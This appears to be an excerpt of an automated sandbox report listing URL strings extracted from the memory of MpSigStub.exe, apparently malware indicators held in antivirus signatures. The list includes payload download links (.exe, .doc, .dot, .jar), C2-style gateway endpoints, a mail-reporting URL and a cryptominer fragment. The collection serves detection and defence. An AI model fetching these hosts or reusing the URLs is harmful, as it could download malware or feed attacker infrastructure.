Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://205.252.24.246/
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://207.154.225.82/report.json?type=mail&u=$muser&c=
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://207.226.171.35/
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://207.226.171.36/
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp String found in binary or memory: http://207.226.177.108/sc.exe
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://207.58.162.237/spy/cartao.scr
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://208.115.201.245/ideal.zip
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://208.95.104.
Source: MpSigStub.exe, 00000023.00000003.18344667874.0000015B1B06E000.00000004.00000001.sdmp String found in binary or memory: http://209.141.61.124/Q-2/
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: http://209.141.61.124/q-2/dy5434app14.exe
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://209.141.61.124/q-2/img_0107803.exe
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://209.62.108.213/
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://209.62.108.220/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://20vp.cn/moyu/
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://210302.top/
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://212.109.196.67/gateway.php
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://212.129.31.67
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://212.192.241.203/xx/kl.exe
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://212.192.241.203/xx/kl.exex
Source: MpSigStub.exe, 00000023.00000003.18344332390.0000015B1C1B7000.00000004.00000001.sdmp String found in binary or memory: http://212.237.58.208/0607/
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://212.86.115.71/template.doc
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://213.159.213.195/d.exe
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: http://216.170.114.73/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://216.172.154.248/pic/img.js
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://216.172.172.40/~agora546/cardoso/dilma.zip
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://217.73.6
Source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp String found in binary or memory: http://217.8.117
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://217.8.117.60/arty.exe
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://217.8.117.63/
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://218.204.253.145/setup.exe
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp String found in binary or memory: http://220.73.162.2/Download
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp String found in binary or memory: http://220.73.162.4/Download
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://22112017.flashplayeron.com
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://223.244.225.3:
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://22y456.com/
Source: MpSigStub.exe, 00000023.00000003.18334190857.0000015B1A60C000.00000004.00000001.sdmp String found in binary or memory: http://23.244.141.185/cgi-bin
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://23.249.163.163/qwerty.exe
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://23.95.122.25/..-.-................-.....-------------/
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://23.95.122.25/..-.-................-.....-------------/.......................................
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: http://23.95.122.31/concord/
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: http://23.95.231.200/images/footer1.dll
Source: MpSigStub.exe, 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp String found in binary or memory: http://24-7-search.com/
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://2fa.com-token-auth.com/
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://2ndrequest.me/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://2p8s.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://2p8s.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://31.192.209.
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://31.192.210.
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://31.192.211.
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://31.210.20.225:8080/server.exe&quot;)
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: http://3117488091/lib/jquery-3.2.1.min.js
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://32player.com
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://365well.org/zload/get_exe.php?l=
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://37.10.71.35/scan001-jpeg.jar
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://37.120.206.70/dom/d.wbk
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: http://37.120.206.70/mend/
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://37.187.248.215/promo.php
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://3b3.org/
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://3dplayful.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp String found in binary or memory: http://3gool.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://3novices.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://3rbfilm.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://3s249.s249327.96.lt/mss2ro37qtl3cbw9vo0lk2bx8vv7jmx2mlesim9ddw11fem3sjp3ijuoufk/mss.php
Source: MpSigStub.exe, 00000023.00000003.18344667874.0000015B1B06E000.00000004.00000001.sdmp String found in binary or memory: http://3z.fi/evil1/PMwGWkmh
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://41.59.0.100/intranet
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: http://45.12.32.58/
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://45.12.32.87/
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://45.12.32.9/
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://45.138.157.216/44313
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://45.138.172.158
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://45.139.236.86/scan.wbk?raw=true
Source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp String found in binary or memory: http://45.144.30.16/
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://45.145.185.85xmr=network001sys=sysrv002#killoldfilespkill-9
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://45.150.67.233/
Source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://45.55.29.117/download/nsis/pb_nsissetup.exe
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://45.63.107.19/PhilaeAp05.cpl
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: http://45.67.230.159/
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: http://45.77.255.68/5.sctscrobj.dll
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://45.84.1.195/
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://45.85.90.14/i88/Kpbehmu.ex
Source: MpSigStub.exe, 00000023.00000003.18344996372.0000015B1B0B0000.00000004.00000001.sdmp String found in binary or memory: http://45.9.148.35/chimaera/bin/rpm_deb_apk/x86_64/openssh.rpm
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://45.9.148.35/chimaera/sh/
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://45.90.59.77/
Source: MpSigStub.exe, 00000023.00000003.18327477882.0000015B1B65E000.00000004.00000001.sdmp String found in binary or memory: http://45.90.59.97/44313
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://46.183.220.123/wxx.doc
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://46.243.136.238/
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://47.89.187.54
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://4threquest.me/
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://5.1.83.182:8000/cgi-bin/hello.py?
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://5.135.73.116/win/document_0120200.doc
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://5.152.203.117/tues/invoice.doc
Source: MpSigStub.exe, 00000023.00000003.18327477882.0000015B1B65E000.00000004.00000001.sdmp String found in binary or memory: http://5.34.180.57/44313
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://5.39.124.175/files/module.exe
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://5.39.217.221/win/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://5.39.219.206/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://50.63.128.
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: http://51.254.164.244/
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://51.255.155.1/pages/filecloud/5e2d7b130cf4feb03023e580b3432fa9d71d7838.exe
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://51.75.142.21/
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://51.81.114.167:
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp String found in binary or memory: http://513389.cn/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://54.183.79.85/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://54.187.129.3/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://54.191.142.124/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://54.191.185.232/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://54.193.9.202/
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp String found in binary or memory: http://54.214.246.97/log/SilentUpdater7/install
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://54.215.150.138/
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://54.237.176.95/z2.php?a=%s&b=%d&c=%d&d=%d&e=%d&f=%d&g=%s&h=%d&i=%d&z=%d&y=%d
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://54.237.176.95/z2.php?a=%s&b=%d&c=%d&d=%d&e=%d&f=%d&g=%s&h=%d&i=%d&z=%d&y=%dx
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://54.37.16.60/up/
Source: MpSigStub.exe, 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp String found in binary or memory: http://56489.eu5.org
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://58.65.235.3/up/get_exa.php?l=
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://58.65.239.124/
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://58.65.239.82
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://5p0h.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://5p0h.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://5starvideos.com/main/
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://5starvideos.com/main/K
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://5starvideos.com/main/K5
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: http://5u2mr.com/unbbmevd/d76.php?l=oev4.cab
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://61.135.159.183/installer/sobar.exe
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://61.160.222.11:
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://61.19.253.
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: http://62.109.31.216/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://62.210.214.
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://63.219.176.248/
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/CFL/
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/EX/
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/EX/x
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/K/F
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/NL2/?w=
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://64.156.31.
Source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp String found in binary or memory: http://64.27.0.205
Source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp String found in binary or memory: http://64.27.0.205/up/calc2.bin
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://64.28.184.4/js.php?id=2011
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://65.181.112.251/coke/w8.txt
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp String found in binary or memory: http://65.243.103.
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://65.243.103.58/trafc-2/rfe.php
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://65.243.103.58/trafc-2/rfe.phpg
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://65.243.103.80/80
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://66.117.6.174/ups.rar
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://66.148.74.7/zu2/zc.php
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://66.40.9.246/binaries
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://66.98.138.92/PH/
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://67.15.
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://67.210.122.222/~turks/lego/
Source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp String found in binary or memory: http://68.178.225.162
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp String found in binary or memory: http://69.31.80.
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://69.31.84.223/
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: http://69.50.164.11/v1/mh.php?pid=%s&cid=%s&p=%s&t=%s&vh=%i&vt=%i
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://69.64.36.110/msn.php?email=
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://6flp.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: http://6tof.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18301236868.0000015B1B97A000.00000004.00000001.sdmp String found in binary or memory: http://7-.j-z-0-3-0-u-u-x-f-1l-3-l-h-w-b-q-z-u-5-n-l-l-m-s-5-v-s-z-g.info
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://70.38.40.185
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://72.29.80.113/~nossacai/
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://74.cz
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: http://75.127.1.211/hkcmd/document.doc
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: http://76h1.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: http://77.221.149.219
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: http://77.221.149.219/
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: http://77.81.225.138/carnaval2017.zip
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://78.128.92.108/document/word.doc
Source: MpSigStub.exe, 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp String found in binary or memory: http://78.157.143.251
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://78.24.220.183/
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://78.soupay.com/plugin/g.asp?id=
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://79.125.7.221/
Source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp String found in binary or memory: http://8.8.8.8/
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://81.16.141.208/q37kkp
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://81.176.237.140/serv/
Source: MpSigStub.exe, 00000023.00000003.18430430309.0000015B1C0EF000.00000004.00000001.sdmp String found in binary or memory: http://81.177.26.20/ayayay
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://81.29.241.70/new/counter.phpframeborder=
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://82.118.23.186/
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: http://82.98.119.68/wp-admin/app/alim.doc
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://82.98.119.68/wp-admin/app/updates.doc
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp String found in binary or memory: http://82.98.235.
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://82.98.235.63/cgi-bin/check/autoaff3
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://83.136.232.110/44285
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://83.149.75.54/cgi-bin
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://83.166.242.164/desktop-st7lsde/
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://83.166.242.164/desktop-st7lsde/bid/relay.dot
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://83.166.242.164/desktop-st7lsde/nay.dot
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://83.166.246.59/sgz2/rejoice/lowered.dot
Source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp String found in binary or memory: http://85.17.138.60
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://85.17.3.151/cgi-bin
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://85.234.191.170/inst.php?id=
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://85.234.191.a7
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://85.255.11
Source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp String found in binary or memory: http://85.255.119
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://85.255.11http://ad.eltext.comhttp://ad.tuzikmedia.biz.rsrc
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://88.208.17.127/
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://888888.2288.org/Monitor_INI
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://88888888.7766.org/ExeIni
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp String found in binary or memory: http://89.188.16.
